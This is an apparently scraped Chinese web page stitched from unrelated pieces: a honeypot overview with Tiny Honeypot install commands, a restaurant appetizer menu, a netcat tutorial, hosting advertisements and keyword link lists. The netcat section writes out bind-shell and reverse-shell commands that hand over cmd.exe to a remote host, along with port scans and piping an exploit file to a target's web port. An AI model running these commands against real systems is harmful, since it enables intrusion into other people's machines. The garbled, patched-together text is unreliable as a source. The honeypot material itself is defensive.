Honeypotnc如何使用

Honeypot  时间:2021-05-30  阅读:()

'蜜罐系统是何钟系统

蜜罐(Honeypot)是一种在互联网上运行的计算 机系统。

它是专门为吸引并诱骗那些试图非法闯 入他人计算机系统的人(如电脑黑客)而设计的,蜜 罐系统是一个包含漏洞的诱骗系统,它通过模拟 一个或多个易受攻击的主机,给攻击者提供一个 容易攻击的目标。

由于蜜罐并没有向外界提供真 正有价值的服务,因此所有对蜜罐尝试都被视为 可疑的。

蜜罐的另一个用途是拖延攻击者对真正 目标的攻击,让攻击者在蜜罐上浪费时间。

简单 点一说:蜜罐就是诱捕攻击者的一个陷阱。

Honeypot的特点 (1) 它不是一个单一的系统,而是一个网络,是 一种高度相 互作用的Honeypot ,装有多个系统和应用软 件。

(2) 所有放置在 内的系统都是标准 的产品系统, 即真实的系统和应用软件都不是仿效的。

Honeypot分类 可以有多种方法对其进行分类:根据蜜罐 的设计目的不同,可以分为产品型蜜罐和 研究型蜜罐二种;根据蜜罐的工作方式不 同可以分为牺牲型蜜罐和外观型蜜罐二 种。

蜜罐的主要技术 蜜罐的主要技术有网络欺骗,端口重定向,报警,数据控制 和数据捕获等。

1.网络欺骗技术: 为了使蜜罐对入侵者更有吸引力,就要采用各种欺骗手段。

例如在欺骗主机上模拟一些操作系统一些网络攻击者最"喜 欢"的端口和各种认为有入侵可能的漏洞。

2.端口重定向技术: 端口重定向技术,可以在工作系统中模拟一个非工作服务。

例如我们正常使用WEB服务(80),而用TELNET(23)和FTP (21)重定向到蜜罐系统中,而实际上这两个服务是没有开 启的,而攻击者扫描时则发现这两个端口是开放的,而实际 上两个端口是HONEYPOT虚拟出来的,对其服务器而不产生危 害性。

3.攻击(入侵)报警和数据控制 蜜罐系统本身就可以模拟成一个操作系统,我们可以把其 本身设定成为易攻破的一台主机,也就是开放一些端口和 弱口令之类的,并设定出相应的回应程序,如在LINUX中的 SHELL,和FTP程序,当攻击者"入侵"进入系统(这里所 指是HONEYPOT虚拟出来的系统)后,当进入后就相当于攻 击者进入一个设定"陷阱",那么攻击者所做一切都在其 监视之中:如TELNET密码暴力破解,添加新用户,权限提升, 删除添加文件,还可以给入侵者一个网络连接让其可以进 行网络传输,并可以作为跳板 4.数据的捕获技术 在攻击者入侵的同时,蜜罐系统将记录攻击者输入输出信 息,键盘记录信息,屏幕信息,以及攻击者曾使用过的工 具,并分析攻击者所要进行的下一步。

捕获的数据不能放 在加有HONEYPOT的主机上,因为有可能被攻击者发现,从 而使其觉察到这是一个"陷阱"而提早退出 典型的Sebek部署。

客户端模块安装在蜜罐(蓝 色)里,蜜罐里攻击者行为被捕获后发送到网络 (对攻击者是不可见的)并且由Honey wall网关被 动的收集。

Tiny Honeypot介绍 Tiny Honeypot 是由e Bakos最初编写,Tiny Honeypot最出色的一点就是系 统容易受到攻击,不用担心电脑黑客和电脑高手们不能入侵,一般会成功的,Tiny Honeypot具有很好的收集那些坏家伙(入侵者) 入侵的信息和信息保存机制。

Tiny Honeypot安装: 首先要下载thp-0.4.6.tar.gz程序然后执行下列命令: cd /usr/local #切换目录到/usr/local zcat thp-0.4.6.tar.gz | tar -xvf - #解压gz文件 ln -s thp-0.4.6.tar.gz thp #建立软链接 mkdir /var/log/hpot #新建目录 chown nobody:nobody /var/log/hpot #设定目录权限 chmod 700 /var/log/hpot #修改查看日志权限 cp ./thp/d.d/* /etc/d.d edit d files to change to :"disable = no" #修改参数(后面详解) #make any path & preferences adjustements in thp.conf & iptables.rules ./thp/iptables.rules #修改规则 /etc/rc.d/init.d/portmap start #启动portmap pmap_set < ./thp/fakerpc /etc/rc.d/init.d/d start #启动d 配置过程: 1 .建议在ROOT用户上进行安装,"chmod 700 /var/log/hpot"修改 访问日志的权限,使只有ROOT才能对其进行访问 2.edit d files to change to :"disable = no" 3../thp/iptables.rules 编译iptables.rules访问规则,注意修改其 ip_forward环境变量为"". 0 4.对honeypot进行网络配置 对 Honeypot进行网络及环境变量配置,如IP地址, 允许正常使用的端口,Honeypot重定向的端口以久虚拟的 网络服务,如正常使用80端口进行WWW服务,21,23端口 进行虚拟,Honeypot可以虚拟出许多的服务,如FTP服 务,WWW服务,远程SHELL,SMTP服务等,在这里就不 一一细说了。

配置实例

Appetizers是什么意思?

头盘餐前小品Appetizers 1.各式刺身拼Sashimi Platter 2.锅贴Pot Sticker 3.辣汁脆炸鸡腿Fried Chicken Legs (Spicy Hot) 4.鸡沙律Chicken Salad 5.酥炸大虾Fried Prawns 6.酥炸生豪Fried Oysters 7.酥炸鲜鱿Fried Squid 8.海哲分蹄Smoked Jelly Fish 9.五香牛展Special Beef 10.白云凤爪Chicken Leg 11.琥珀合桃House Special Honey Walnuts 12.脆皮春卷Spring Rolls 13.蜜汁叉烧B.B.Q. Pork

nc如何使用

一、基本使用 想要连接到某处: nc [-options] hostname port[s] [ports] … 绑定端口等待连接: nc -l -p port [-options] [hostname] [port] 参数: -e prog 程序重定向,一旦连接,就执行 [危险!!] -g gateway source-routing hop point[s], up to 8 G num source-routing pointer: 4, 8, 12, … -I secs 延时的间隔 -l 监听模式,用于入站连接 -n 指定数字的IP地址,不能用hostname -o file 记录16进制的传输 -p port 本地端口号 -r 任意指定本地及远程端口 -s addr 本地源地址 -t 以的形式应答 -u UDP模式 -v 详细输出——用多个-v可得到更详细的内容 -z 将输入输出关掉——用于扫描时 -w secs timeout的时间 二. 它的简单使用方法 1.nc -l -p 80 监听80端口 2.nc -l -p 80 >c:log.dat 监听80端口,并把信息记录到log.dat 3.nc -v -l -p 80 监听80端口,并显示端口信息 4.nc -l -p 80 -t -e cmd.exe 监听本地的80端口的入站信息,同时将cmd.exe重定向至80端口,当有人连接的时候,就让cmd.exe以的形式应答 5.nc -v ip port 扫描某ip的某个端口 6.nc -v -z ip port-port 扫描某ip的某端口到某端口 7.nc -v -z -u ip port-port 扫描某ip的某udp端口到某udp端口 7.扫描远程主机 nc -nvv -w2 -z 192.168.x.x 80-445 扫描192.168.x.x的TCP 80到TCP445的所有端口 8.REMOTE主机绑定SHELL nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口 9.REMOTE主机绑定SHELL并反向连接 nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354 绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口 三.使用的例子 1. 计算机192.168.0.1运行:nc -v -n -p 99 计算机192.168.0.8运行:nc -e cmd.exe 192.168.0.1 99 这样我们就获得了192.168.0.8的一个shell 2.计算机192.168.0.1运行:nc -v -n 192.168.0.8 99 计算机192.168.0.8运行:nc -v -l -p 99 >d:sc.exe 四.高级用法: 1.作攻击程序用 格式1:type c:exploit.txt|nc -nvv 192.168.x.x 80 格式2:nc -nvv 192.168.x.x 80 < c:exploit.txt 连接到192.168.x.x的80端口,并在其管道中发送’c:exploit.txt’的内容(两种格式确有相同的效果, 真是有异曲同工之妙) 2.作蜜罐用 nc -L -p 80 > c:log.txt 使用’-L’可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到’c:log.txt’中,如果把’>’ 改为’>>’即可以追加日志 3.作蜜罐用 nc -L -p 80 < c:honeypot.txt 使用’-L’可以不停地监听某一个端口,直到ctrl+c为止,并把’c:honeypot.txt’的内容’送’入其 管道中

Nocser:马来西亚独立服务器促销$60.00/月

Nocser刚刚在WHT发布了几款促销服务器,Intel Xeon X3430,8GB内存,1TB HDD,30M不限流量,月付$60.00。Nocser是一家注册于马来西亚的主机商,主要经营虚拟主机、VPS和马来西亚独立服务器业务,数据中心位于马来西亚AIMS机房,线路方面,AIMS到国内电信一般,绕日本NTT;联通和移动比较友好,联通走新加坡,移动走香港,延迟都在100左右。促销马来西亚服务器...

青云互联-洛杉矶CN2弹性云限时五折,9.5元/月起,三网CN2gia回程,可选Windows,可自定义配置

官方网站:点击访问青云互联官网优惠码:五折优惠码:5LHbEhaS (一次性五折,可月付、季付、半年付、年付)活动方案:的套餐分为大带宽限流和小带宽不限流两种套餐,全部为KVM虚拟架构,而且配置都可以弹性设置1、洛杉矶cera机房三网回程cn2gia 洛杉矶cera机房                ...

licloud:$39/月,香港物理服务器,30M带宽,e3-1230v3/16G内存/1T硬盘

licloud官方消息:当前对香港机房的接近100台物理机(香港服务器)进行打折处理,30Mbps带宽,低至不到40美元/月,速度快,性价比高,跑绝大多数项目都是绰绰有余了。该款香港服务器自带启动、关闭、一键重装功能,正常工作日内30~60分钟交货(不包括非工作日)。 官方网站:https://licloud.io 特价香港物理服务器 CPU:e3-1230v2(4核心、8线程、3.3GH...

Honeypot为你推荐
mac地址克隆无线路由器mac地址克隆有什么用处?y码女款衣服XXL、XL、XXXL尺码分别是多大?qq博客怎样开通QQ博客?腾讯年终奖腾讯工作怎么样搜索引擎的概念搜索引擎营销的概念是什么?国产操作系统下载国产操作系统要钱吗小四号字Excel小四号字等于几号字assemblyinfoasp.net这几个文件是干什么的?assemblyinfoLOL的 X、L、CS 是什么意思微软操作系统下载怎样在微软官网下载windows7 64位旗舰版
www二级域名 网站域名备案查询 directspace oneasiahost z.com win8.1企业版升级win10 网站实时监控 标准机柜尺寸 老左来了 1g内存 流量计费 台湾谷歌 linux使用教程 空间登入 国外在线代理服务器 国内域名 湖南idc 日本代理ip 美国迈阿密 宿迁服务器 更多